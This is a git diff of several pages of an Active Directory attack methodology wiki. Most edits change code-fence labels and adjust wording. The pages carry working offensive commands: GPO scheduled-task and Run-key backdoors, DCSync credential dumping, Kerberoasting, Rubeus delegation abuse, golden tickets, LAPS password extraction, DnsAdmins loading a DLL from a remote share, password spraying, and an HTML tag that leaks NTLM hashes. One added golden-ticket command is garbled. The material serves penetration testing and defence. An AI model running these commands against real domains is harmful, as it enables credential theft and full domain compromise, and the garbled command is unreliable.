$IdentityReference = (New-Object System.Security.Principal.NTAccount("spotless")).Translate([System.Security.Principal.SecurityIdentifier])
$ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference,"GenericAll","Allow"
@ -150,7 +150,7 @@ To identify misconfigured GPOs, PowerSploit's cmdlets can be chained together. T
Misconfigured GPOs can be exploited to execute code, for example, by creating an immediate scheduled task. This can be done to add a user to the local administrators group on affected machines, significantly elevating privileges:
```powershell
```bash
New-GPOImmediateTask -TaskName evilTask -Command cmd -CommandArguments "/c net localgroup administrators spotless /add" -GPODisplayName "Misconfigured Policy" -Verbose -Force
```
@ -158,7 +158,7 @@ New-GPOImmediateTask -TaskName evilTask -Command cmd -CommandArguments "/c net l
The GroupPolicy module, if installed, allows for the creation and linking of new GPOs, and setting preferences such as registry values to execute backdoors on affected computers. This method requires the GPO to be updated and a user to log in to the computer for execution:
```powershell
```bash
New-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=dev,DC=domain,DC=io"
Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "%COMSPEC% /b /c start /b /min \\dc-2\software\pivot.exe" -Type ExpandString
```

2
src/windows-hardening/active-directory-methodology/ad-certificates.md
View File

@ -78,7 +78,7 @@ Certificates can be requested through:
Windows users can also request certificates via the GUI (`certmgr.msc` or `certlm.msc`) or command-line tools (`certreq.exe` or PowerShell's `Get-Certificate` command).
```powershell
```bash
# Example of requesting a certificate using PowerShell
Get-Certificate -Template "User" -CertStoreLocation "cert:\\CurrentUser\\My"
```

2
src/windows-hardening/active-directory-methodology/ad-certificates/README.md
View File

@ -78,7 +78,7 @@ Certificates can be requested through:
Windows users can also request certificates via the GUI (`certmgr.msc` or `certlm.msc`) or command-line tools (`certreq.exe` or PowerShell's `Get-Certificate` command).
```powershell
```bash
# Example of requesting a certificate using PowerShell
Get-Certificate -Template "User" -CertStoreLocation "cert:\\CurrentUser\\My"
```

10
src/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md
View File

@ -8,7 +8,7 @@
Before checking how to steal the certificates here you have some info about how to find what the certificate is useful for:
```powershell
```bash
# Powershell
$CertPath = "C:\path\to\cert.pfx"
$CertPass = "P@ssw0rd"
@ -87,7 +87,7 @@ These files can be searched for using PowerShell or the command prompt by lookin
In cases where a PKCS#12 certificate file is found and it is protected by a password, the extraction of a hash is possible through the use of `pfx2john.py`, available at [fossies.org](https://fossies.org/dox/john-1.9.0-jumbo-1/pfx2john_8py_source.html). Subsequently, JohnTheRipper can be employed to attempt to crack the password.
```powershell
```bash
# Example command to search for certificate files in PowerShell
Get-ChildItem -Recurse -Path C:\Users\ -Include *.pfx, *.p12, *.pkcs12, *.pem, *.key, *.crt, *.cer, *.csr, *.jks, *.keystore, *.keys
@ -98,11 +98,11 @@ pfx2john.py certificate.pfx > hash.txt
john --wordlist=passwords.txt hash.txt
```
## NTLM Credential Theft via PKINIT THEFT5
## NTLM Credential Theft via PKINIT THEFT5 (UnPAC the hash)
The given content explains a method for NTLM credential theft via PKINIT, specifically through the theft method labeled as THEFT5. Here's a re-explanation in passive voice, with the content anonymized and summarized where applicable:
To support NTLM authentication [MS-NLMP] for applications that do not facilitate Kerberos authentication, the KDC is designed to return the user's NTLM one-way function (OWF) within the privilege attribute certificate (PAC), specifically in the `PAC_CREDENTIAL_INFO` buffer, when PKCA is utilized. Consequently, should an account authenticate and secure a Ticket-Granting Ticket (TGT) via PKINIT, a mechanism is inherently provided which enables the current host to extract the NTLM hash from the TGT to uphold legacy authentication protocols. This process entails the decryption of the `PAC_CREDENTIAL_DATA` structure, which is essentially an NDR serialized depiction of the NTLM plaintext.
To support NTLM authentication `MS-NLMP` for applications that do not facilitate Kerberos authentication, the KDC is designed to return the user's NTLM one-way function (OWF) within the privilege attribute certificate (PAC), specifically in the `PAC_CREDENTIAL_INFO` buffer, when PKCA is utilized. Consequently, should an account authenticate and secure a Ticket-Granting Ticket (TGT) via PKINIT, a mechanism is inherently provided which enables the current host to extract the NTLM hash from the TGT to uphold legacy authentication protocols. This process entails the decryption of the `PAC_CREDENTIAL_DATA` structure, which is essentially an NDR serialized depiction of the NTLM plaintext.
The utility **Kekeo**, accessible at [https://github.com/gentilkiwi/kekeo](https://github.com/gentilkiwi/kekeo), is mentioned as capable of requesting a TGT containing this specific data, thereby facilitating the retrieval of the user's NTLM. The command utilized for this purpose is as follows:
@ -110,6 +110,8 @@ The utility **Kekeo**, accessible at [https://github.com/gentilkiwi/kekeo](https
tgt::pac /caname:generic-DC-CA /subject:genericUser /castore:current_user /domain:domain.local
```
**`Rubeus`** can also get this information with the option **`asktgt [...] /getcredentials`**.
Additionally, it is noted that Kekeo can process smartcard-protected certificates, given the pin can be retrieved, with reference made to [https://github.com/CCob/PinSwipe](https://github.com/CCob/PinSwipe). The same capability is indicated to be supported by **Rubeus**, available at [https://github.com/GhostPack/Rubeus](https://github.com/GhostPack/Rubeus).
This explanation encapsulates the process and tools involved in NTLM credential theft via PKINIT, focusing on the retrieval of NTLM hashes through TGT obtained using PKINIT, and the utilities that facilitate this process.

6
src/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
View File

@ -262,7 +262,7 @@ Possession of **`ManageCertificates`** rights facilitates the approval of pendin
A combination of **Certify** and **PSPKI** modules can be utilized to request, approve, and download a certificate:
```powershell
```bash
# Request a certificate that will require an approval
Certify.exe request /ca:dc.domain.local\theshire-DC-CA /template:ApprovalNeeded
[...]
@ -403,7 +403,7 @@ certutil.exe -enrollmentServerURL -config DC01.DOMAIN.LOCAL\DOMAIN-CA
<figure><img src="../../../images/image (757).png" alt=""><figcaption></figcaption></figure>
```powershell
```bash
Import-Module PSPKI
Get-CertificationAuthority | select Name,Enroll* | Format-List *
```
@ -686,7 +686,7 @@ In other words, when a user has permission to enroll a certificate and the certi
Use [Check-ADCSESC13.ps1](https://github.com/JonasBK/Powershell/blob/master/Check-ADCSESC13.ps1) to find OIDToGroupLink:
```powershell
```bash
Enumerating OIDs
------------------------
OID 23541150.FCB720D24BC82FBD1A33CB406A14094D links to group: CN=VulnerableGroup,CN=Users,DC=domain,DC=local

27
src/windows-hardening/active-directory-methodology/constrained-delegation.md
View File

@ -4,16 +4,16 @@
## Constrained Delegation
Using this a Domain admin can **allow** a computer to **impersonate a user or computer** against a **service** of a machine.
Using this a Domain admin can **allow** a computer to **impersonate a user or computer** against any **service** of a machine.
- **Service for User to self (**_**S4U2self**_**):** If a **service account** has a _userAccountControl_ value containing [TRUSTED_TO_AUTH_FOR_DELEGATION](<https://msdn.microsoft.com/en-us/library/aa772300(v=vs.85).aspx>) (T2A4D), then it can obtain a TGS for itself (the service) on behalf of any other user.
- **Service for User to Proxy(**_**S4U2proxy**_**):** A **service account** could obtain a TGS on behalf any user to the service set in **msDS-AllowedToDelegateTo.** To do so, it first need a TGS from that user to itself, but it can use S4U2self to obtain that TGS before requesting the other one.
- **Service for User to self (_S4U2self_):** If a **service account** has a _userAccountControl_ value containing [TrustedToAuthForDelegation](<https://msdn.microsoft.com/en-us/library/aa772300(v=vs.85).aspx>) (T2A4D), then it can obtain a TGS for itself (the service) on behalf of any other user.
- **Service for User to Proxy(_S4U2proxy_):** A **service account** could obtain a TGS on behalf any user to the service set in **msDS-AllowedToDelegateTo.** To do so, it first need a TGS from that user to itself, but it can use S4U2self to obtain that TGS before requesting the other one.
**Note**: If a user is marked as _Account is sensitive and cannot be delegated_ in AD, you will **not be able to impersonate** them.
This means that if you **compromise the hash of the service** you can **impersonate users** and obtain **access** on their behalf to the **service configured** (possible **privesc**).
This means that if you **compromise the hash of the service** you can **impersonate users** and obtain **access** on their behalf to any **service** over the indicated machines (possible **privesc**).
Moreover, you **won't only have access to the service that the user is able to impersonate, but also to any service** because the SPN (the service name requested) is not being checked, only privileges. Therefore, if you have access to **CIFS service** you can also have access to **HOST service** using `/altservice` flag in Rubeus.
Moreover, you **won't only have access to the service that the user is able to impersonate, but also to any service** because the SPN (the service name requested) is not being checked (in the ticket this part is not encrypted/signed). Therefore, if you have access to **CIFS service** you can also have access to **HOST service** using `/altservice` flag in Rubeus for example.
Also, **LDAP service access on DC**, is what is needed to exploit a **DCSync**.
@ -26,6 +26,13 @@ Get-DomainComputer -TrustedToAuth | select userprincipalname, name, msds-allowed
ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes cn,dnshostname,samaccountname,msds-allowedtodelegateto --json
```
```bash:Quick Way
# Generate TGT + TGS impersonating a user knowing the hash
Rubeus.exe s4u /user:sqlservice /domain:testlab.local /rc4:2b576acbe6bcfda7294d6bd18041b8fe /impersonateuser:administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /altservice:ldap /ptt
```
- Step 1: **Get TGT of the allowed service**
```bash:Get TGT
# The first step is to get a TGT of the service that can impersonate others
## If you are SYSTEM in the server, you might take it from memory
@ -37,11 +44,11 @@ ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))"
mimikatz sekurlsa::ekeys
## Request with aes
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05
tgt::ask /user:dcorp-adminsrv$ /domain:sub.domain.local /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05
.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /opsec /nowrap
# Request with RC4
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d
tgt::ask /user:dcorp-adminsrv$ /domain:sub.domain.local /rc4:8c6264140d5ae7d03f7f2a53088a291d
.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi
```
@ -50,11 +57,13 @@ tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140
>
> **Just having that TGT ticket (or hashed) you can perform this attack without compromising the whole computer.**
- Step2: **Get TGS for the service impersonating the user**
```bash:Using Rubeus
#Obtain a TGS of the Administrator user to self
# Obtain a TGS of the Administrator user to self
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /impersonateuser:Administrator /outfile:TGS_administrator
#Obtain service TGS impersonating Administrator (CIFS)
# Obtain service TGS impersonating Administrator (CIFS)
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /outfile:TGS_administrator_CIFS
#Impersonate Administrator on different service (HOST)

4
src/windows-hardening/active-directory-methodology/custom-ssp.md
View File

@ -22,7 +22,7 @@ HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Add `mimilib.dll` to the Security Support Provider list (Security Packages):
```powershell
```bash
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
```
@ -32,7 +32,7 @@ And after a reboot all credentials can be found in clear text in `C:\Windows\Sys
You can also inject this in memory directly using Mimikatz (notice that it could be a little bit unstable/not working):
```powershell
```bash
privilege::debug
misc::memssp
```

12
src/windows-hardening/active-directory-methodology/dcsync.md
View File

@ -16,19 +16,19 @@ The **DCSync** permission implies having these permissions over the domain itsel
Check who has these permissions using `powerview`:
```powershell
```bash
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
```
### Exploit Locally
```powershell
```bash
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
```
### Exploit Remotely
```powershell
```bash
secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
[-just-dc-user <USERNAME>] #To get only of that user
[-pwd-last-set] #To see when each account's password was last changed
@ -41,7 +41,7 @@ secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
- one with the the **Kerberos keys**
- one with cleartext passwords from the NTDS for any accounts set with [**reversible encryption**](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption) enabled. You can get users with reversible encryption with
```powershell
```bash
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol
```
@ -49,13 +49,13 @@ secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
If you are a domain admin, you can grant this permissions to any user with the help of `powerview`:
```powershell
```bash
Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose
```
Then, you can **check if the user was correctly assigned** the 3 privileges looking for them in the output of (you should be able to see the names of the privileges inside the "ObjectType" field):
```powershell
```bash
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}
```

4
src/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
View File

@ -8,7 +8,7 @@ In this scenario **your domain** is **trusting** some **privileges** to principa
### Outbound Trust
```powershell
```bash
# Notice Outbound trust
Get-DomainTrust
SourceName : root.local
@ -36,7 +36,7 @@ A security vulnerability exists when a trust relationship is established between
The critical aspect to understand here is that the password and hash of this special account can be extracted from a Domain Controller in domain **A** using a command line tool. The command to perform this action is:
```powershell
```bash
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
```

8
src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md
View File

@ -8,7 +8,7 @@ In this scenario an external domain is trusting you (or both are trusting each o
First of all, you need to **enumerate** the **trust**:
```powershell
```bash
Get-DomainTrust
SourceName : a.domain.local --> Current domain
TargetName : domain.external --> Destination domain
@ -66,7 +66,7 @@ If you **couldn't** find any **special** access of your user in the other domain
You can use **Powerview functions** to **enumerate** the **other domain** using the `-Domain` param like in:
```powershell
```bash
Get-DomainUser -SPN -Domain domain_name.local | select SamAccountName
```
@ -80,7 +80,7 @@ Get-DomainUser -SPN -Domain domain_name.local | select SamAccountName
Using a regular method with the credentials of the users who is has access to the external domain you should be able to access:
```powershell
```bash
Enter-PSSession -ComputerName dc.external_domain.local -Credential domain\administrator
```
@ -93,7 +93,7 @@ If a user is migrated **from one forest to another** and **SID Filtering is not
> [!WARNING]
> As a reminder, you can get the signing key with
>
> ```powershell
> ```bash
> Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.domain.local
> ```

6
src/windows-hardening/active-directory-methodology/golden-ticket.md
View File

@ -17,6 +17,12 @@ python psexec.py jurassic.park/stegosaurus@lab-wdc02.jurassic.park -k -no-pass
```
```bash:From Windows
# Rubeus
## The /ldap command will get the details from the LDAP (so you don't need to put the SID)
## The /printcmd option will print the complete command if later you want to generate a token offline
.\Rubeus.exe asktgt /user:Rubeus.exe golden /rc4:<krbtgt hash> /domain:<child_domain> /sid:<child_domain_sid> /sids:<parent_domain_sid>-519 /user:Administrator /ptt /ldap /nowrap /printcmd
/rc4:25b2076cda3bfd6209161a6c78a69c1c /domain:jurassic.park /ptt
#mimikatz
kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt
.\Rubeus.exe ptt /ticket:ticket.kirbi

7
src/windows-hardening/active-directory-methodology/kerberoast.md
View File

@ -20,6 +20,9 @@ For executing **Kerberoasting**, a domain account capable of requesting **TGS ti
> [!WARNING]
> **Kerberoasting tools** typically request **`RC4 encryption`** when performing the attack and initiating TGS-REQ requests. This is because **RC4 is** [**weaker**](https://www.stigviewer.com/stig/windows_10/2017-04-28/finding/V-63795) and easier to crack offline using tools such as Hashcat than other encryption algorithms such as AES-128 and AES-256.\
> RC4 (type 23) hashes begin with **`$krb5tgs$23$*`** while AES-256(type 18) start with **`$krb5tgs$18$*`**`.`
> Moreover, be careful because `Rubeus.exe kerberoast` request tickets automatically over ALL the vulnerable accounts which will get you detected. First, find kerberoastable users with interesting privileges and then run it nly over them.
```bash
#### **Linux**
@ -45,7 +48,7 @@ adenum -d <DOMAIN.FULL> -ip <DC_IP> -u <USERNAME> -p <PASSWORD> -c
- **Enumerate Kerberoastable users**
```powershell
```bash
# Get Kerberoastable users
setspn.exe -Q */* #This is a built-in binary. Focus on user accounts
Get-NetUser -SPN | select serviceprincipalname #Powerview
@ -54,7 +57,7 @@ Get-NetUser -SPN | select serviceprincipalname #Powerview
- **Technique 1: Ask for TGS and dump it from memory**
```powershell
```bash
#Get TGS in memory from a single user
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ServicePrincipalName" #Example: MSSQLSvc/mgmt.domain.local

6
src/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
View File

@ -29,7 +29,7 @@ Another way to avoid this problem which is [**notably insecure**](https://docs.m
It is highly recommended that **CredSSP** be disabled on production systems, sensitive networks, and similar environments due to security concerns. To determine whether **CredSSP** is enabled, the `Get-WSManCredSSP` command can be run. This command allows for the **checking of CredSSP status** and can even be executed remotely, provided **WinRM** is enabled.
```powershell
```bash
Invoke-Command -ComputerName bizintel -Credential ta\redsuit -ScriptBlock {
Get-WSManCredSSP
}
@ -41,7 +41,7 @@ Invoke-Command -ComputerName bizintel -Credential ta\redsuit -ScriptBlock {
To address the double hop issue, a method involving a nested `Invoke-Command` is presented. This does not solve the problem directly but offers a workaround without needing special configurations. The approach allows executing a command (`hostname`) on a secondary server through a PowerShell command executed from an initial attacking machine or through a previously established PS-Session with the first server. Here's how it's done:
```powershell
```bash
$cred = Get-Credential ta\redsuit
Invoke-Command -ComputerName bizintel -Credential $cred -ScriptBlock {
Invoke-Command -ComputerName secdev -Credential $cred -ScriptBlock {hostname}
@ -54,7 +54,7 @@ Alternatively, establishing a PS-Session with the first server and running the `
A solution to bypass the double hop problem involves using `Register-PSSessionConfiguration` with `Enter-PSSession`. This method requires a different approach than `evil-winrm` and allows for a session that does not suffer from the double hop limitation.
```powershell
```bash
Register-PSSessionConfiguration -Name doublehopsess -RunAsCredential domain_name\username
Restart-Service WinRM
Enter-PSSession -ConfigurationName doublehopsess -ComputerName <pc_name> -Credential domain_name\username

8
src/windows-hardening/active-directory-methodology/laps.md
View File

@ -30,7 +30,7 @@ You could **download the raw LAPS policy** from `\\dc\SysVol\domain\Policies\{4A
Moreover, the **native LAPS PowerShell cmdlets** can be used if they're installed on a machine we have access to:
```powershell
```bash
Get-Command *AdmPwd*
CommandType Name Version Source
@ -53,7 +53,7 @@ Get-AdmPwdPassword -ComputerName wkstn-2 | fl
**PowerView** can also be used to find out **who can read the password and read it**:
```powershell
```bash
# Find the principals that have ReadPropery on ms-Mcs-AdmPwd
Get-AdmPwdPassword -ComputerName wkstn-2 | fl
@ -67,7 +67,7 @@ The [LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) facilitates the enu
One is parsing **`ExtendedRights`** for **all computers with LAPS enabled.** This will show **groups** specifically **delegated to read LAPS passwords**, which are often users in protected groups.\
An **account** that has **joined a computer** to a domain receives `All Extended Rights` over that host, and this right gives the **account** the ability to **read passwords**. Enumeration may show a user account that can read the LAPS password on a host. This can help us **target specific AD users** who can read LAPS passwords.
```powershell
```bash
# Get groups that can read passwords
Find-LAPSDelegatedGroups
@ -117,7 +117,7 @@ Password: 2Z@Ae)7!{9#Cq
Once admin, it's possible to **obtain the passwords** and **prevent** a machine from **updating** its **password** by **setting the expiration date into the future**.
```powershell
```bash
# Get expiration time
Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime

9
src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
View File

@ -36,6 +36,15 @@ To conform to operational security and use AES256, the following command can be
.\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec
```
## Stealthier version
> [!WARNING]
> Each logon session can only have one active TGT at a time so be careful.
1. Create a new logon sesison with **`make_token`** from Cobalt Strike.
2. Then, use Rubeus to generate a TGT for the new logon session without affecting the existing one.
## References
- [https://www.tarlogic.com/es/blog/como-atacar-kerberos/](https://www.tarlogic.com/es/blog/como-atacar-kerberos/)

2
src/windows-hardening/active-directory-methodology/password-spraying.md
View File

@ -93,7 +93,7 @@ done
- With [**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1) (It can generate users from the domain by default and it will get the password policy from the domain and limit tries according to it):
```powershell
```bash
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
```

6
src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
View File

@ -124,6 +124,12 @@ If you can perform a MitM attack to a computer and inject HTML in a page he will
<img src="\\10.10.17.231\test.ico" height="1" width="1" />
```
## Other ways to force and phish NTLM authentication
{{#ref}}
../ntlm/places-to-steal-ntlm-creds.md
{{#endref}}
## Cracking NTLMv1
If you can capture [NTLMv1 challenges read here how to crack them](../ntlm/index.html#ntlmv1-attack).\

22
src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md
View File

@ -14,7 +14,7 @@ This group is empowered to create accounts and groups that are not administrator
To identify the members of this group, the following command is executed:
```powershell
```bash
Get-NetGroupMember -Identity "Account Operators" -Recurse
```
@ -28,7 +28,7 @@ An attacker could exploit this by modifying the **AdminSDHolder** group's ACL, g
Commands to review the members and modify permissions include:
```powershell
```bash
Get-NetGroupMember -Identity "AdminSDHolder" -Recurse
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'spotless'}
@ -66,7 +66,7 @@ Membership in the `Backup Operators` group provides access to the `DC01` file sy
To list group members, execute:
```powershell
```bash
Get-NetGroupMember -Identity "Backup Operators" -Recurse
```
@ -160,7 +160,7 @@ Members of the **DnsAdmins** group can exploit their privileges to load an arbit
To list members of the DnsAdmins group, use:
```powershell
```bash
Get-NetGroupMember -Identity "DnsAdmins" -Recurse
```
@ -168,7 +168,7 @@ Get-NetGroupMember -Identity "DnsAdmins" -Recurse
Members can make the DNS server load an arbitrary DLL (either locally or from a remote share) using commands such as:
```powershell
```bash
dnscmd [dc.computername] /config /serverlevelplugindll c:\path\to\DNSAdmin-DLL.dll
dnscmd [dc.computername] /config /serverlevelplugindll \\1.2.3.4\share\DNSAdmin-DLL.dll
An attacker could modify the DLL to add a user to the Domain Admins group or execute other commands with SYSTEM privileges. Example DLL modification and msfvenom usage:
@ -208,7 +208,7 @@ DnsAdmins can manipulate DNS records to perform Man-in-the-Middle (MitM) attacks
### Event Log Readers
Members can access event logs, potentially finding sensitive information such as plaintext passwords or command execution details:
```powershell
```bash
# Get members and search logs for sensitive information
Get-NetGroupMember -Identity "Event Log Readers" -Recurse
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'}
@ -218,7 +218,7 @@ Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Va
This group can modify DACLs on the domain object, potentially granting DCSync privileges. Techniques for privilege escalation exploiting this group are detailed in Exchange-AD-Privesc GitHub repo.
```powershell
```bash
# List members
Get-NetGroupMember -Identity "Exchange Windows Permissions" -Recurse
```
@ -251,7 +251,7 @@ Members of the **Print Operators** group are endowed with several privileges, in
To list the members of this group, the following PowerShell command is used:
```powershell
```bash
Get-NetGroupMember -Identity "Print Operators" -Recurse
```
@ -261,7 +261,7 @@ For more detailed exploitation techniques related to **`SeLoadDriverPrivilege`**
This group's members are granted access to PCs via Remote Desktop Protocol (RDP). To enumerate these members, PowerShell commands are available:
```powershell
```bash
Get-NetGroupMember -Identity "Remote Desktop Users" -Recurse
Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Desktop Users"
```
@ -272,7 +272,7 @@ Further insights into exploiting RDP can be found in dedicated pentesting resour
Members can access PCs over **Windows Remote Management (WinRM)**. Enumeration of these members is achieved through:
```powershell
```bash
Get-NetGroupMember -Identity "Remote Management Users" -Recurse
Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Management Users"
```
@ -283,7 +283,7 @@ For exploitation techniques related to **WinRM**, specific documentation should
This group has permissions to perform various configurations on Domain Controllers, including backup and restore privileges, changing system time, and shutting down the system. To enumerate the members, the command provided is:
```powershell
```bash
Get-NetGroupMember -Identity "Server Operators" -Recurse
```

4
src/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md
View File

@ -8,7 +8,7 @@ If the **external group** has **RDP access** to any **computer** in the current
Once that user has accessed via RDP, the **attacker can pivot to that users session** and abuse its permissions in the external domain.
```powershell
```bash
# Supposing the group "External Users" has RDP access in the current domain
## lets find where they could access
## The easiest way would be with bloodhound, but you could also run:
@ -40,7 +40,7 @@ If a user access via **RDP into a machine** where an **attacker** is **waiting**
In this case you could just **compromise** the **victims** **original computer** by writing a **backdoor** in the **statup folder**.
```powershell
```bash
# Wait til someone logs in:
net logons
Logged on users at \\localhost:

25
src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
View File

@ -5,18 +5,18 @@
## Basics of Resource-based Constrained Delegation
This is similar to the basic [Constrained Delegation](constrained-delegation.md) but **instead** of giving permissions to an **object** to **impersonate any user against a service**. Resource-based Constrain Delegation **sets** in **the object who is able to impersonate any user against it**.
This is similar to the basic [Constrained Delegation](constrained-delegation.md) but **instead** of giving permissions to an **object** to **impersonate any user against a machine**. Resource-based Constrain Delegation **sets** in **the object who is able to impersonate any user against it**.
In this case, the constrained object will have an attribute called _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ with the name of the user that can impersonate any other user against it.
Another important difference from this Constrained Delegation to the other delegations is that any user with **write permissions over a machine account** (_GenericAll/GenericWrite/WriteDacl/WriteProperty/etc_) can set the _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ (In the other forms of Delegation you needed domain admin privs).
Another important difference from this Constrained Delegation to the other delegations is that any user with **write permissions over a machine account** (_GenericAll/GenericWrite/WriteDacl/WriteProperty/etc_) can set the **_msDS-AllowedToActOnBehalfOfOtherIdentity_** (In the other forms of Delegation you needed domain admin privs).
### New Concepts
Back in Constrained Delegation it was told that the **`TrustedToAuthForDelegation`** flag inside the _userAccountControl_ value of the user is needed to perform a **S4U2Self.** But that's not completely truth.\
The reality is that even without that value, you can perform a **S4U2Self** against any user if you are a **service** (have a SPN) but, if you **have `TrustedToAuthForDelegation`** the returned TGS will be **Forwardable** and if you **don't have** that flag the returned TGS **won't** be **Forwardable**.
However, if the **TGS** used in **S4U2Proxy** is **NOT Forwardable** trying to abuse a **basic Constrain Delegation** it **won't work**. But if you are trying to exploit a **Resource-Based constrain delegation, it will work** (this is not a vulnerability, it's a feature, apparently).
However, if the **TGS** used in **S4U2Proxy** is **NOT Forwardable** trying to abuse a **basic Constrain Delegation** it **won't work**. But if you are trying to exploit a **Resource-Based constrain delegation, it will work**.
### Attack structure
@ -24,7 +24,7 @@ However, if the **TGS** used in **S4U2Proxy** is **NOT Forwardable** trying to a
Suppose that the attacker has already **write equivalent privileges over the victim computer**.
1. The attacker **compromises** an account that has a **SPN** or **creates one** (“Service A”). Note that **any** _Admin User_ without any other special privilege can **create** up until 10 **Computer objects (**_**MachineAccountQuota**_**)** and set them a **SPN**. So the attacker can just create a Computer object and set a SPN.
1. The attacker **compromises** an account that has a **SPN** or **creates one** (“Service A”). Note that **any** _Admin User_ without any other special privilege can **create** up until 10 Computer objects (**_MachineAccountQuota_**) and set them a **SPN**. So the attacker can just create a Computer object and set a SPN.
2. The attacker **abuses its WRITE privilege** over the victim computer (ServiceB) to configure **resource-based constrained delegation to allow ServiceA to impersonate any user** against that victim computer (ServiceB).
3. The attacker uses Rubeus to perform a **full S4U attack** (S4U2Self and S4U2Proxy) from Service A to Service B for a user **with privileged access to Service B**.
1. S4U2Self (from the SPN compromised/created account): Ask for a **TGS of Administrator to me** (Not Forwardable).
@ -34,7 +34,7 @@ Suppose that the attacker has already **write equivalent privileges over the vic
To check the _**MachineAccountQuota**_ of the domain you can use:
```powershell
```bash
Get-DomainObject -Identity "dc=domain,dc=local" -Domain domain.local | select MachineAccountQuota
```
@ -42,9 +42,9 @@ Get-DomainObject -Identity "dc=domain,dc=local" -Domain domain.local | select Ma
### Creating a Computer Object
You can create a computer object inside the domain using [powermad](https://github.com/Kevin-Robertson/Powermad)**:**
You can create a computer object inside the domain using **[powermad](https://github.com/Kevin-Robertson/Powermad):**
```powershell
```bash
import-module powermad
New-MachineAccount -MachineAccount SERVICEA -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
@ -52,18 +52,18 @@ New-MachineAccount -MachineAccount SERVICEA -Password $(ConvertTo-SecureString '
Get-DomainComputer SERVICEA
```
### Configuring R**esource-based Constrained Delegation**
### Configuring Resource-based Constrained Delegation
**Using activedirectory PowerShell module**
```powershell
```bash
Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount SERVICEA$ #Assing delegation privileges
